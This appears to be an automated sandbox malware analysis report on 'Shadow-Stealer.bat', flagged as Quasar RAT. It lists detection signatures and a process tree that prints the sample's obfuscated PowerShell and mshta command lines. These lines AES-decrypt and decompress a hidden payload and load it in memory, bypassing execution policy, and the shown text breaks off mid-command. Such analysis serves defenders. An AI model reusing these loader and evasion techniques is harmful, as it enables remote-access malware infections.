Windows
Analysis Report
Shadow-Stealer.bat
Overview
General Information
Detection
Quasar
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS (the process tree below shows it running from C:\Windows as $sxr-powershell.exe, alongside $sxr-mshta.exe and $sxr-cmd.exe)
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into foreign processes
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Classification
- System is w10x64
- cmd.exe (PID: 1668 cmdline:
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4072 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Shadow-Stealer.bat.exe (PID: 3180 cmdline:
"Shadow-St ealer.bat. exe" -nopr ofile -win dowstyle h idden -ep bypass -co mmand func tion pXqKy ($AMMuC){ $QAuMi=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( ); $QAuMi. Mode=[Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C; $QAuMi. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7; $ QAuMi.Key= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('lo y14lThS3Sg Wk7zmlM+U1 LaSbD9l9+G RTu5mLzp2m M='); $QAu Mi.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('lS2Ypg JeBrTrEw/f JyL2OQ==') ; $LSyot=$ QAuMi.Crea teDecrypto r(); $retu rn_var=$LS yot.Transf ormFinalBl ock($AMMuC , 0, $AMMu C.Length); $LSyot.Di spose(); $ QAuMi.Disp ose(); $re turn_var;} function Y aPup($AMMu C){ $BpqPy =New-Objec t System.I O.MemorySt ream(,$AMM uC); $MUxy L=New-Obje ct System. IO.MemoryS tream; $QR zEr=New-Ob ject Syste m.IO.Compr ession.GZi pStream($B pqPy, [IO. Compressio n.Compress ionMode]:: Decompress ); $QRzEr. CopyTo($MU xyL); $QRz Er.Dispose (); $BpqPy .Dispose() ; $MUxyL.D ispose(); $MUxyL.ToA rray();}fu nction dAv Ur($AMMuC, $oAPri){ $ TIrdu=[Sys tem.Reflec tion.Assem bly]::('da oL'[-1..-4 ] -join '' )([byte[]] $AMMuC); $ cmozY=$TIr du.EntryPo int; $cmoz Y.Invoke($ null, $oAP ri);}$agzC o=[System. IO.File]:: ('txeTllAd aeR'[-1..- 11] -join '')('C:\Us ers\user\D esktop\Sha dow-Steale r.bat').Sp lit([Envir onment]::N ewLine);fo reach ($xW gWP in $ag zCo) { if ($xWgWP.St artsWith(' SEROXEN')) { $gZeLJ= $xWgWP.Sub string(7); break; }} $paQQY=[st ring[]]$gZ eLJ.Split( '\');$ahdV x=YaPup (p XqKy ([Con vert]::('g nirtS46esa BmorF'[-1. 
.-16] -joi n '')($paQ QY[0])));$ qbiwj=YaPu p (pXqKy ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $paQQY[1]) ));dAvUr $ qbiwj (,[s tring[]] ( '', 'idTzn CCsreqaEEj vuwzuTuitg lIVMFHEuLs TnnuHsLwyM mxaqK', 'L kIzMJCsatT hEdeYOSSAw nZMOfyqejP cYtnoxQiuO bLPDohIJN' ));dAvUr $ ahdVx (,[s tring[]] ( '', 'idTzn CCsreqaEEj vuwzuTuitg lIVMFHEuLs TnnuHsLwyM mxaqK', 'L kIzMJCsatT hEdeYOSSAw nZMOfyqejP cYtnoxQiuO bLPDohIJN' )); MD5: 04029E121A0CFA5991749937DD22A1D9) - dllhost.exe (PID: 3940 cmdline:
C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba} MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 1036 cmdline:
C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C) - dllhost.exe (PID: 5576 cmdline:
C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87} MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 964 cmdline:
C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
- $sxr-mshta.exe (PID: 2616 cmdline:
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - $sxr-cmd.exe (PID: 1804 cmdline:
"C:\Window s\$sxr-cmd .exe" /c % $sxr-tjpto UybjVuvgCO JtIWn4312: &#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2244 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - $sxr-powershell.exe (PID: 6400 cmdline:
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gni